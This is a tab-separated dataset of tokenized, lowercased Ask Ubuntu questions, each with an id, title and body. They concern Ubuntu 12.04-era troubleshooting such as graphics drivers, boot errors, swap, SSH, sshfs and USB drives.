127304	how to connect to internet through vm 's internet connection ?	i am new to ubuntu . i have a wimax connection ( uh-235 ) . i connect the device through usb . the connection must be dhcp ( assigned by the service provider ) . problem is , the driver+connection manager software is only available for windows and the source are closed . so i could n't find any way to connect to internet from ubuntu . so i setup windows-7 in vmware-workstation and now i can connect to internet from my guest pc ( windows-7 ) . is there any possible way to share the connection of guest-windows7 internet connection to my host ( ubuntu ) ? ?
127305	how to install ubuntu on a computer with a nvidia geforce gtx 550 ti ?	when i try to install ubuntu 12.04 64-bits on my desktop computer , i do n't get any video output from the installation since i click `` install ubuntu '' ( or something like that ) . it stays with a black screen just like in a console . i googled about my problem and i found that maybe ubuntu is n't capable of showing image when running on a nvidia geforce gtx 550 ti , but i could n't find any solution . how can i install ubuntu on my dear computer ? : p ps : the problem is n't with the usb i use , i installed already ubuntu 12.04 64 into my netbook asus 1215p , and is working fine .
127313	how do i add different packages to maas clients on installation ?	i would like to modify the images that are included in maas so that i can install laptops and desktops with it instead of the normal cloud images .
127314	swap is only being recognized when trying ubuntu from live cd	i recently increased space and swap space for ubuntu on my laptop . even though the space got increased , my swap is not being recognized . it is showing as 0 bytes of space . however , interestingly , when i boot from live cd and click try ubuntu , space for swap is being recognized . what can be causing this weird problem ? normal boot : bhaarat @ bhaarat-laptop ~ % free total used free shared buffers cached mem : 1015780 954008 61772 0 49836 449444 -/+ buffers/cache : 454728 561052 swap : 0 0 0 live cd boot ubuntu @ ubuntu : ~ $ free total used free shared buffers cached mem : 1015780 983500 32280 0 87408 558984 -/+ buffers/cache : 337108 678672 swap : 13590952 384 13590568 outputs in live cd boot output of grep swap /etc/fstab /dev/sda6 swap swap defaults 0 0 output of sudo fdisk -l disk /dev/sda : 80.0 gb , 80026361856 bytes 240 heads , 63 sectors/track , 10337 cylinders units = cylinders of 15120 * 512 = 7741440 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2bd2c32a device boot start end blocks id system /dev/sda2 1 10338 78149632 5 extended /dev/sda5 * 1 8539 64551936 83 linux /dev/sda6 8540 10338 13590958+ 82 linux swap / solaris output of sudo swapon -a no output gparted screenshot : update contents of cat /proc/swaps after the fix are : filename type size used priority /dev/sda6 partition 13590952 0 -1
127320	1080p screen resolution problem after 10.04 to 12.04 update	i have a samsung lcd 40 '' with a nvidia geforce 6150se nforce 430 card . i recently upgraded from 10.04 to 12.04 and the best resolution i can get is 1360x768 . i 've tried the propietary drivers available on the repository kmod : nvidia_current kmod : nvidia_173_updates kmod : nvidia_current_updates kmod : nvidia_96 kmod : nvidia_96_updates kmod : nvidia_173 i 've also downloaded latest from nvidia 's web , version : 295.40 . but still no luck . with nouveau driver , i can only get 1024x768 . i know there is no problem with my hardware ( video card , cable and monitor ) , i was using it perfectly on 10.04 . can anybody suggest something else i could try , to get my 1920x1080 resolution back ? here are some more information , that i got reading other similar posts on askubuntu . lspci | grep vga : 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 ) xrandr : xrandr : failed to get size of gamma for output default screen 0 : minimum 320 x 240 , current 1360 x 768 , maximum 1360 x 768 default connected 1360x768 0 0 0mm x 0mm 1360x768 50.0 52.0* 1024x768 51.0 800x600 53.0 54.0 55.0 680x384 56.0 57.0 640x480 58.0 576x432 59.0 512x384 60.0 400x300 61.0 62.0 63.0 320x240 64.0
127324	intel cpu whine	since i installed ubuntu 12.04 i started hearing cpu whine again . it 's really loud and annoying . i tried setting max_cstate to 2 , did n't help . on windows i remember muting the microphone - that fixed it . on ubuntu it doesnt work . the cpu is intel i7 720qm , laptop is asus n71jq . thanks !
127326	how to fix missing gpg keys ?	i have just installed ubuntu 12.04 and i added some repo and when apt-get update i got missing gpg key . following command seems to does n't work for me : apt-get update 2 > /tmp/keymissing ; for key in $ ( grep `` no_pubkey '' /tmp/keymissing |sed `` s/ . *no_pubkey // '' ) ; do echo -e `` \nprocessing key : $ key '' ; gpg -- keyserver subkeys.pgp.net -- recv $ key & & sudo gpg -- export -- armor $ key | apt-key add - ; done how to fix this problem ?
127327	error : unknown command 'gfxmode ' . pressing any key continues	a few days ago , i installed ubuntu 12.04 . i changed the order of systems on the list of boot loader ( i use windows vista and ubuntu on one computer ) . i also changed , by the way , the appearance of the selection screen ( resolution ) . all this with the grub customizer . after reboot and after the list of systems to choose was shown , i got a message : âerror : unknown command 'gfxmode ' . pressing any key continues ... `` . ubuntu starts even without pressing any key . the problem is repeated each time when i run ubuntu . how to solve it ?
127330	ca n't use any kind of `` super '' key combinations for keybindings in ubuntu 12.04 from the control center	i 've changed my unity launcher from super to alt+f1 because i ( used to ) set a lot of commands with super keybindings . it appears to not work at all in ubuntu 12.04 . is there a solution ? thanks ! ot : also , ctrl+alt+q fails since ctrl+q closes the gnome control center ...
127335	can a friend upload files to my ubuntuone folder ?	i understand that it is possible to share folders in ubuntuone , and to give friends the privilege of downloading or modifying files . i would like to know , is it possible for a friend to upload a file into my folder ? for example , i would like to invite a client to upload a video file to a folder i have shared with her , so that i may work on that file . thanks , mercedes
127348	12.04 installation not completing	here 's the problem i 've been having , installing from a cd i burned , in the 'try ubuntu ' mode : i get to the point where i 'm asked to fill in my name , the computer name , etc . ; after i press 'continue ' , the installation window closes and the installation does n't go any further - i.e. , the system does n't seem to start actually installing , and i 'm never asked to restart the computer or do anything else . all that happens is i get the desktop and a busy cursor ... for seven and a half hours . restarting the computer after waiting that seven and a half hours resulted in nothing but a '_ ' blinking on and off at the point where i 'd expect ubuntu to boot if it 'd installed properly . what am i doing wrong , or , failing my being at fault somehow , what can i do to fully install ubuntu ? i 've tried bypassing 'try ubuntu ' and just doing 'install ubuntu ' from the get-go , but it always ends up having an 'unrecoverable error ' ( again , at the point after i fill in my name , computer name , etc. ) . forgive my lack of knowledge ; i 'm a fairly basic user and i do n't mind admitting that this problem has put me out of my depth . thank you .
127351	why have i to use my memory usb to be able to start ubuntu 12.04 ?	i used a memory usb to install ubuntu 12.04 , since i removed `` windows 7 `` , now ubuntu it is my only operating system , but i had a problem when i stopped installing it , to be able to initiate ubuntu , i have to have connected the memory usb , if i her do not connect the only thing that goes out it is a screen of black color with a low script blinking , to insure myself that the problem was with the memory usb , i eliminated all his files that it had to install ubuntu , when i turned it to trying with the memory usb formatted , it continued starting and when it was removing it , only the screen was going out in black . how can i arrange it ? another thing that i noticed is that it never goes out grub 's menu
127355	12.04 unity 3d does not load	i have a nvidia graphics card , and unity 3d will not load . when i log into a 3d session , i see my wallpaper . i am able to right click . how can i fix this ?
127358	ubuntu freezes running the first time	12.04 freezes on first run after install , loading screen says 'preparing to run ubuntu for the first time ... ' â stuck on 2nd dot after a few cycles . on dell inspiron b130 installed using windows installer thanks in advance ! ! !
127360	why ca n't i access a directory on another device if it has more than around 500 files ?	i am having an issue with ubuntu natty ( 32 bit version ) trying to access a directory on a freenas server ( set up to share files using samba ) that is also on the local network . it seems that if there are under a certain number of files ( just under 500 , maybe 497 or 498 ) it can access the directory just fine . add one more file , and ubuntu refuses to show anything in the directory . however if i change the filename of the last added file to something very short ( like 1.ext ) then it will sometimes display it . there is no such limit on files on local hard drives connected to the ubuntu system . also , all non-ubuntu computers on the network have no problem accessing the directory on the freenas server , so that pretty well seems to narrow it down to being an issue with ubuntu accessing files over a network ( and maybe only when samba is being used , though i do n't know that ) . this is just a plain local network connection using samba ; i am not using any sort of `` tunnel '' or vpn or anything like that , and i have n't played around with any settings that would change the way packets are sent or received . so my question is , when accessing a directory on a remote share ( using samba ) is there any limit in ubuntu on the number of files in a directory , or the number of characters in the combined filenames within the directory , or any other limit that might explain this strange behavior ? if anyone even thinks they might have an explanation for this issue i 'd like to hear it because so far nothing about this has made any sense . but if i ca n't get it resolved i may wind up having to install some other operating system on this computer , just so i can access my files on the freenas share . basically i am wondering if there might be some value in some configuration file ( maybe sysctl.conf ? ) that could be changed to avoid this problem . please note that i am not a linux or ubuntu expert ( just because i know what sysctl.conf is , do n't assume i have been playing around with it â in fact i only learned about that file earlier today ) .
127361	how to install jre-7 on xubuntu ?	i have followed the other question and did not succeed . mv : can not move './jre1.7.0_04 ' to '/usr/lib/jvm/jre1.7.0 ' : no such file or directory is it installed into the 32bit compatible /lib directory only ? running : linux user 2.6.38-14-generic # 58-ubuntu smp time-date-stuff x86_64 x86_64 x86_64 gnu/linux xubuntu does not include any java ( yeah ! ) , but now i want to play with yed . : (
127362	ubuntu 12.04 lts is unstable on my system	i have installed 12.04 lts as a upgrade and even after waiting for that seemed to be a very long time to complete , i found the system to be unstable and for apps not to work . so i decided to format and reinstall , but then it went from bad to worse . i am using an nvidia graphics card : when downloading the drivers it would seem to take for ever or totally crash . when i finally get it installed and setup my dual screen when i go to run display from the ubuntu menu it comes up with an error message saying : could not get screen information - randr extension is not present can some one please tell me what i can do to solve this , or should i go back to 11.10 and give it time for the os to find its feet . thanks for any help ian
127367	dark purple screen with graphic corruption at boot , using wubi	decided to give ubuntu a try using the stand alone wubi.exe . when i 'm done installing , and rebooting for the first time , i only get a black screen with a blinking text input cursor , and my caps lock and scroll lock blinks . after another reboot , i get this screen with image corruption . i am using an nvidia geforce 580 graphics card on a asus p7p55d pro motherboard running windows 7 hp 64bit .
127369	how to prevent `` write failed : broken pipe '' on ssh connection ?	what can i do to configure ssh on both client and servers to prevent write failed : broken pipe errors ? it often occurs if you sleep your client computer and resume later .
127374	i can log in with my password , but it 's not accepted as valid for authentication	i can log in with my password just fine , but when trying to use sudo to run commands or authenticating to install software , my password does not work and my account is an administrator account . further more , when i try to change my password with `` passwd '' in recovery mode , i get `` authentication token manipulation error . '' i 've just installed 12.04 , so i 'm not sure what i could 've done to break the system .
127375	i can not install canon mp 495 scanner driver on ubuntu 12.04	i spent several hours trying to install the canon mp495 scan driver on ubuntu 12.04 . no way . it still works as a printer but it stopped working as a scanner since ubuntu 12.04 upgrade from 11.04 . in previous 11.04 version it worked perfectly . please help .
127382	where 's the default farsi ( persian ) font file ?	there is a default font for each language in ubuntu , which is displayed in menus , captions , etc . as far as i 'm concerned they 're located in /usr/shared/fonts . my problem is that i ca n't find the default farsi font file , no matter wherever and how long i search ! where is that ttf file ? p.s . : i 've looked into the ubuntu family folder ; nothing .
127386	input does n't work after upgrading to ubuntu 12.04	i have a macbook pro 6,2 running osx 10.6.8 , windows 7 , and ubuntu . i use refit to be able to choose which one to boot but i 've never had a problem with refit in the past . i was running ubuntu 11.10 , but just upgraded today to 12.04 . i 'm quite excited to try it out , after hearing about some of the improvements and additions . i installed and rebooted , and no errors were displayed during this process . after restarting , i edited my grub the way i normally do ( i have an option that i enabled on grub that has n't been working and i keep forgetting to change it , so i have to do it each time on boot ) . anyway , the keyboard worked just fine at that point ( it had to , because i typed with it ) , but after hitting ctrl+x and initializing the boot , it seems to stop working . no messages pop up , but then it gets to the login screen and the icons in the top show the `` image not found '' icon ( http : //www.aerotaskforce.com/thumb/capturar.jpg/w/150 ) and no input devices work . the built-in trackpad does not allow me to move the mouse and does n't seem to register anything ( the mouse is stuck in the middle of the screen ) , and the keyboard does n't allow me to type in my password . so , i had to manually restart by hitting the power button , and this time i chose recovery mode . however , even then , i did n't see any problems . the only error i got was that `` pty '' failed . is there any way i can fix this without having to reinstall the entire os from scratch ? *edit : : * i determined that this is unity and not the keyboard drivers , because they work on grub and in command line , when i managed to boot into that . booted into command line and ran `` sudo apt-get -f install '' and it ran for about ten minutes , during which i noticed that my fans do n't work an ubuntu anymore either . so , in trying to install the ability to manually control my fans , i determined that my network card is not recognized anymore , either , and i ca n't apt-get install anything . so , whatever it was , i broke everything . during the apt-get -f install process , i got this message : '' temperature above threshold cpu clock throttled ''
127387	ca n't login ( through gui ) after upgrade from 11.10 to 12.04	after upgrading from 11.10 to 12.04 i ca n't login with my account through the gui . if , at the login screen , i go to a command line i 'm able to login and everything seems to work fine . i can also login as the guest account without any problems . but , logging in as my account causes a system freeze . if i 'm quick i can drop back to the command line , after starting graphical login process , and before the system freezes . if i do this i can check logs out and continue to use the system . but , when going back to the graphical session the system freezes immediately and i can no longer return to the command line . system info : linux x220r 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux i also encrypted my home directory through the last ( 11.10 ) install . i suspected that might be a problem , but i can access my home directory fine while logging in through the command line . syslog taken right after starting a login from the login screen . apr 28 17:40:07 x220r sudo : pam_ecryptfs : pam_sm_authenticate : /home/matt is already mounted apr 28 17:41:43 x220r acpid : client 1093 [ 0:0 ] has disconnected apr 28 17:41:43 x220r acpid : client connected from 1093 [ 0:0 ] apr 28 17:41:43 x220r acpid : 1 client rule loaded apr 28 17:41:43 x220r kernel : [ 142.913591 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id apr 28 17:41:43 x220r kernel : [ 142.913613 ] [ drm : drm_mode_getfb ] *error* invalid framebuffer id apr 28 17:41:43 x220r kernel : [ 143.000528 ] [ drm ] changing lvds panel from ( +hsync , -vsync ) to ( -hsync , -vsync ) apr 28 17:41:51 x220r lightdm : pam_ecryptfs : pam_sm_authenticate : /home/matt is already mounted apr 28 17:41:51 x220r kernel : [ 151.180497 ] valid ecryptfs headers not found in file header region or xattr region , inode 524953 apr 28 17:41:51 x220r kernel : [ 151.180507 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio apr 28 17:41:51 x220r kernel : [ 151.226646 ] valid ecryptfs headers not found in file header region or xattr region , inode 524953 apr 28 17:41:51 x220r kernel : [ 151.226649 ] either the lower file is not in a valid ecryptfs format , or the key could not be retrieved . plaintext passthrough mode is not enabled ; returning -eio lightdm.log taken right after starting a login from the login screen . [ +1.47s ] debug : connecting to xserver :0 [ +1.47s ] debug : starting greeter [ +1.47s ] debug : started session 1342 with service 'lightdm ' , username 'lightdm' [ +1.59s ] debug : session 1342 authentication complete with return value 0 : success [ +1.59s ] debug : greeter authorized [ +1.59s ] debug : logging to /var/log/lightdm/x-0-greeter.log [ +1.59s ] debug : session 1342 running command /usr/lib/lightdm/lightdm-greeter-session /usr/sbin/unity-greeter [ +1.82s ] debug : greeter connected version=1.2.1 [ +1.82s ] debug : greeter connected , display is ready [ +1.82s ] debug : new display ready , switching to it [ +1.82s ] debug : activating vt 7 [ +2.40s ] debug : greeter start authentication for matt [ +2.40s ] debug : started session 1536 with service 'lightdm ' , username 'matt' [ +2.41s ] debug : session 1536 got 1 message ( s ) from pam [ +2.41s ] debug : prompt greeter with 1 message ( s ) any ideas about things to look into ? i hate to do this , but i 've already pulled the files i want and i 'm considering a clean reinstall . update : looks like i 'm suffering from this dual-monitor bug : https : //bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/921236 unplugging my external monitor lets me log in . so far this is no confirmed fix , so i 'm without an external monitor for the time being . update 2 : i was able to fix the issue by downgrading xserver-xorg-input-evdev . more details here : https : //bugs.launchpad.net/evdev/+bug/921236/comments/64
127389	how to configure ubuntu as an ldap client ?	how to configure ubuntu 12.04 as ldap client with pam modules ?
127391	rescue all files from ( a maybe dead ) ubuntu	i am unable to get on ubuntu so i want to rescue my art files . but i do n't know how . i never did this before and i never experienced this before in an upgrade ether , i 'm kind of scared at the moment . how can i rescue my mypaint , pictures and other files from ( a maybe dead ) ubuntu using windows hp 7 ? i need all the help i can get at the moment . i also might need some visual help too . i only have 1 computer ... ..
127397	which dnsexit client to download for natty ( 11.04 ) ? rpm or deb ?	i have an ubuntu 11.04 server set up to host some websites and i have a dynamic ip address . i am using dnsexit.com to handle the dns routing to the ip address and would like to install their dns client on my system , so whenever the ip address changes , it will automatically update their records . the client comes in three flavors and i do not know which to install . they are all the same version ( 1.6-2 ) . also , are the installation commands that they have on the page accurate ?
127398	usb drive install of ubuntu 12.04 server fails - ca n't find components from cd-rom	i 'm trying to install ubuntu 12.04 server ( 32bit ) on a machine here using a usb stick . i used the universal-usb-installer-1.8.9.4 which has support for 12.04 server to get the iso onto the usb drive . the computer boots up the installation process ok . it gets through the ubuntu language , locale and keyboard selection . then starts loading additional components . at this point it gets about a quarter of the way through then throws big error message saying : [ ! ! ] load installer components from cd there was a problem reading data from the cd-rom . please make sure it is in the drive . if retrying does not work. , you should check the integrity of your cd-rom . failed to copy file from cd-rom . retry ? retrying obviously fails as well . have tried re-running again and installing again onto the usb but no change . have tried checking for cd-rom integrity errors and it breaks on this error : [ ! ] check the cd-rom ( s ) integrity integrity test failed the ./pool/main/l/linux/fs-secondary-modules-3.2.0-23-generic-pae-di_3.2.0-23.36_i386 . file failed the md5 checksum verification . your cd-rom or this file may have been corrupted . have also tried the ubuntu-server 12.04 lts ( precise pangolin ) daily build . no go there . even checked the iso sha1 hashes and they match . have tried linuxlive usb creator 2.8.11 and unetbootin-windows-575 to see if it was an image with the usb drive software but still no go . any ideas ?
127403	how to install ppas and proprietary drivers on a persistent liveusb	i am trying to create a usb persistent pen drive that has all the last updates ahd the following `` special '' packages : added ppas with the programs installed . for example wine . proprietary drivers like nvidia and broadcom . can i install this ppas or proprietary drivers on a persistent usb pen drive . i ask since in 11.04 and 11.10 i tried and i had problems with this . will try on 12.04 when i buy a new pen drive .
127405	matlab ca n't find /lib/libc.so.6 in 12.04	i 'm trying to open matlab ( 32 bit version ) in 12.04 , with matlab -glnx86 but it returns /usr/local/bin/matlab : 1 : /usr/local/temp/bin/util/oscheck.sh : /lib/libc.so.6 : not found /usr/local/temp/bin/glnx86/matlab : error while loading shared libraries : libxpm.so.4 : can not open shared object file : no such file or directory any ideas ? i 've seen similar questions where it turned out that the needed library was moved and had to be linked to the right place , but i 'm a pretty new user and i do n't know how to check for that or fix it .
127410	upgrading to ubuntu 12.04 loses keyboard and mouse	i just upgraded my ubuntu to 12.04 , and somehow its lost keyboard and mouse support , logitech ex110 cordless , preventing me from logging in , both the main and recovery mode wo n't respond to any keys at all , the previous kernal recovery mode does see the keyboard . can i reverse this fatal upgrade somehow ? using the 12.04 live cd does work , but upon trying a reinstall , it hangs on `` reinstalling previously installed packaged '' , which do n't seem to install because `` you have held broken packages '' .
127411	how to stop ssh filesystem from discarding root permissions after every command ?	i have a small bash script that mounts my sshfs ... problem is it ask for the server/host password for every mount ... i have four mounts and i have to enter it every time for 4 times and its tiresome , also i want to make it mount at boot/login ... # ! /bin/bash sudo fusermount -u /mnt/ctb sudo fusermount -u /mnt/dtb sudo fusermount -u /mnt/etb sudo sshfs -o allow_other 192.168.1.10 : /media/ctb /mnt/ctb sudo sshfs -o allow_other 192.168.1.10 : /media/dtb /mnt/dtb sudo sshfs -o allow_other 192.168.1.10 : /media/etb /mnt/etb after every mount comman it ask me for the password of a user on the machine 192.168.1.10 ...
127412	upgraded to 12.04 and now wont stay connected to secyre network .	i upgraded today from 11.10 , and now i can not stay connected to my secure network for more than 10 or 15 seconds . i keep getting asked to put in my network key . i can however wireless tether connect through my droid with out a network key , and stay connected for as long as i want . i 've been poking around and have not been able to get this fixed on my own . i threw some codes in my terminal and came back with this . *-network description : wireless interface product : bcm4321 802.11a/b/g/n vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0c:00.0 logical name : eth1 version : 03 serial : 00:1f : e1:88:99 : c4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.5.100 latency=0 multicast=yes wireless=ieee 802.11abgn resources : irq:17 memory : f9ffc000-f9ffffff memory : f8000000-f80fffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 02 serial : 00:21:70:6d:3f:21 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:17 memory : f9bfe000-f9bfffff xbostonirishx @ linux-box-1720 : ~ $ now none of this means anything to me . i do n't know if this is pertaining to my verizon card , that 's embeded in my laptop , or my wireless card ... . please help../
127414	ubuntu 11.10 `` cant find '' executable files ( not .exe 's )	i am trying to run an executable file from ubuntu 11.10 , and this happens for several different files . i try to run the file and it says `` no such file or directory '' it is not the file because the file was downloaded from a package only , and the exact file runs fines on three of my friends computers . i have recently re installed a new partition of ubuntu 11.10. it is not a permissions issue because i 've tried running it as sudo and ive tried chmod and ive edited the permissions of the actual file to give myself permission and allow it to be run as an executable . my only guess is that there is some deep setting in ubuntu somewhere that is accidently activated which prevents me from running executable . i have seen this same question asked in several places and never receive a satisfactory answer . does anyone know why ubuntu is doing this ? please help as soon as possible , i need this program to run today . this is a major ubuntu problem and prevents me from doing anything on this os . the code i am running is a simple *.sh function . i navigate to the folder and type ./start.sh and it executes the file fine . that file calls another executable within a folder in that directory called bin . before doing so , it adds bin to the $ path so thats not an issue . but when it tries to call that executable , it says it can not find the file . here is the code of the start.sh # ! /bin/sh sdkpath= $ ( dirname $ ( readlink -f $ 0 ) ) uobpath= $ sdkpath/share/uobjects/ uspath= $ sdkpath/share/scripts/ # edit this script as you want : ) script=balltracking.u $ sdkpath/bin/urbi-launch -- start $ uobpath/* -- -- host 0.0.0.0 -- port 54000 -f $ uspath/ $ script its not just this file however . ive gon into several other files and tried running executables in a similar manner and the same error comes up . again these same files are executed fine in other computers with the same commands . the only difference is that they have wubi installed and i am using a partition . i dont know what the issue could be .
127416	draftsight in 12.04	i 've had draftsight in 11.10 ( 32bit ) and followed the instructions here how do i install draftsight cad ? but now that i 've installed 12.04 ( 64bit ) i ca n't get it to happen . any help greatly appreciated . brad @ brad-desktop : ~ $ sudo dpkg -- force-architecture -i draftsight.deb dpkg : error processing draftsight.deb ( -- install ) : can not access archive : no such file or directory errors were encountered while processing : draftsight.deb
127419	ati driver not working after system update ?	i had a working ubuntu 10.04 desktop with ati drivers with three monitors on a radion hd 5750 . after a standard apt-get update ; apt-get upgrade ; reboot i got a black screen ( system booted , but graphics did not display at login screen ) . i went into recovery mode and reset to basic graphics mode . currently , the catalyst control center says the ati driver is not installed . but the `` hardware drivers '' tool ( jockey ) says `` ati fire gl '' is installed and in use . so either : 1 . the driver is not actually installed even though jockey claims it is , or 2 . the driver is installed but catalyst ca n't find/use it . i used apt-get to purge and then reinstall the ati drivers with no improvement . how do i get this driver working again ? is there a way to completely purge/remove everything graphics related and start over like a clean system , but without an os reinstall ?
127423	sound comes from both headphones and laptop speakers	when i plug my headphones into the headphone jack and start watching video or listening to a song , not only does the sound come from headphones , but also from the laptop speakers . this is annoying . what 's the fix ?
127431	sound themes stopped working after upgrade from 11.10 to 12.04	i have upgraded my ubuntu install from 11.10 to 12.04 using the update manager . my sound card is working fine . i 'm able to get sound and i 've verified that the microphone works too , but my sound themes are not working . for example , when i login , the ubuntu login sound is not played . could someone help me figure out how to re-enable it please ?
127435	is there a way i can use empathy to chat with a random person off the internet ?	i am new and disabled and would like to meet new friends . i am a complete newbie and i have ubuntu 12.04 lts . any help would be appreciated .
127439	wo n't detect seagate 2 tb usb 3.0 external drive	so first i googled this question and i came up with this ubuntu forums thread . i did the things that the thread said to do like typing : lsusb sudo fdisk -l then i unplugged my device and plugged it back in and typed in : dmesg | tail like the thread said to do . which gave me this : kiet @ kiet : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 0bda:0151 realtek semiconductor corp. mass storage device ( multicard reader ) bus 002 device 004 : id 05e3:0608 genesys logic , inc. usb-2.0 4-port hub bus 008 device 002 : id 046d : c52e logitech , inc . bus 002 device 005 : id 17a0:0001 samson technologies corp. c01u condenser microphone bus 002 device 006 : id 04b8:085c seiko epson corp. stylus sx125 bus 002 device 009 : id 0bc2:50a1 seagate rss llc kiet @ kiet : ~ $ sudo fdisk -l [ sudo ] password for kiet : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 heads , 63 sectors/track , 91201 cylinders , total 1465149168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c8ff6 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 1429260287 714526720 7 hpfs/ntfs/exfat /dev/sda3 1429262334 1465147391 17942529 5 extended /dev/sda5 1429262336 1465147391 17942528 82 linux swap / solaris disk /dev/sdb : 200.0 gb , 200049647616 bytes 255 heads , 63 sectors/track , 24321 cylinders , total 390721968 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000c6c5e device boot start end blocks id system /dev/sdb1 2048 195311615 97654784 7 hpfs/ntfs/exfat /dev/sdb2 195313662 390721535 97703937 5 extended /dev/sdb5 195313664 378140671 91413504 83 linux /dev/sdb6 378142720 390721535 6289408 82 linux swap / solaris disk /dev/sde : 15.7 gb , 15707668480 bytes 255 heads , 63 sectors/track , 1909 cylinders , total 30679040 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sde1 8192 30679039 15335424 c w95 fat32 ( lba ) disk /dev/sdg : 2000.4 gb , 2000398933504 bytes 255 heads , 63 sectors/track , 243201 cylinders , total 3907029167 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x4188663d device boot start end blocks id system /dev/sdg1 63 3907024127 1953512032+ 7 hpfs/ntfs/exfat kiet @ kiet : ~ $ dmesg | tail [ 21617.753058 ] sd 8:0:0:0 : [ sdg ] write protect is off [ 21617.753063 ] sd 8:0:0:0 : [ sdg ] mode sense : 23 00 00 00 [ 21617.754194 ] sd 8:0:0:0 : [ sdg ] no caching mode page present [ 21617.754197 ] sd 8:0:0:0 : [ sdg ] assuming drive cache : write through [ 21617.756441 ] sd 8:0:0:0 : [ sdg ] no caching mode page present [ 21617.756445 ] sd 8:0:0:0 : [ sdg ] assuming drive cache : write through [ 21617.776958 ] sdg : sdg1 [ 21617.779443 ] sd 8:0:0:0 : [ sdg ] no caching mode page present [ 21617.779448 ] sd 8:0:0:0 : [ sdg ] assuming drive cache : write through [ 21617.779451 ] sd 8:0:0:0 : [ sdg ] attached scsi disk afterwards i typed in : sudo mkdir /media/drive and i tried mounting the drive to that directory : sudo mount -t vfat /dev/sdg1 /media/drive but instead i got this : kiet @ kiet : ~ $ sudo mount -t vfat /dev/sdg1 /media/drive mount : wrong fs type , bad option , bad superblock on /dev/sdg1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so kiet @ kiet : ~ $ so can anyone help me ?
127445	mythmote wont connect to mythbuntu 12.04 , seems frontend is not listening on all interfaces	i just installed a fresh copy of mythbuntu 12.04 . i installed it as a combined frontend and backend . i ran through the configurations , accepting all defaults except for two items : i set the hostname to the server 's ip i checked the checkbox to enable network remote controls i then rebooted . when i try to connect via mythmote , i get `` connection refused '' and `` connection timed out '' errors . what i have done to diagnose the issue : reboot re-run configuration without changing any settings disable ipv6 ( ala /proc/sys/net/ipv6/conf/all/disable_ipv6 ) disable ufw run wireshark , which reports that a tcp syn arrives at the server , and the server sends a tcp rst in response . prior to disabling ufw the server would not even send the tcp rst the settings i have for mythmote are : name : gamma ( this is my third server ) address : 10.0.0.14 port 6546 mac : ( not filled in , i do n't need wol ) if i switch to a tty on the server , i can telnet 127.0.0.1 6546 and get to the network remote control interface . if i try the same via telnet 10.0.0.14 6546 i get a connection refused .
127446	how to fix sudo after `` chmod -r 777 /usr/bin '' ?	i enetered chmod -r 777 /usr/bin and now sudo is not working . it is giving error that sudo must be setuid root . on looking via google , some advice said to run chown root : root /usr/bin/sudo chmod 4755 /usr/bin/sudo . on entering chown root : root /usr/bin/sudo it is showing an opened in readonly mode error .
127447	how do i slow down the mouse cursor ?	i 've been using linux for over 10 years and just downloaded 12.04 to my wife 's laptop . it looks good but i ca n't find a way to slow the cursor down ( yes , i have gone to system settings and they are as slow as possible ) . this is on a system 76 pangolin laptop with the pad .
127449	how can i change the icon for jupiter ?	i installed jupiter to try to improve my laptop 's performance , and it 's doing rather well : d however , i use the radiance theme ( white windows , white topbar , black indicator applets etc . ) and jupiter only has a white icon , so i ca n't really see it ... is there any way for me to change it ?
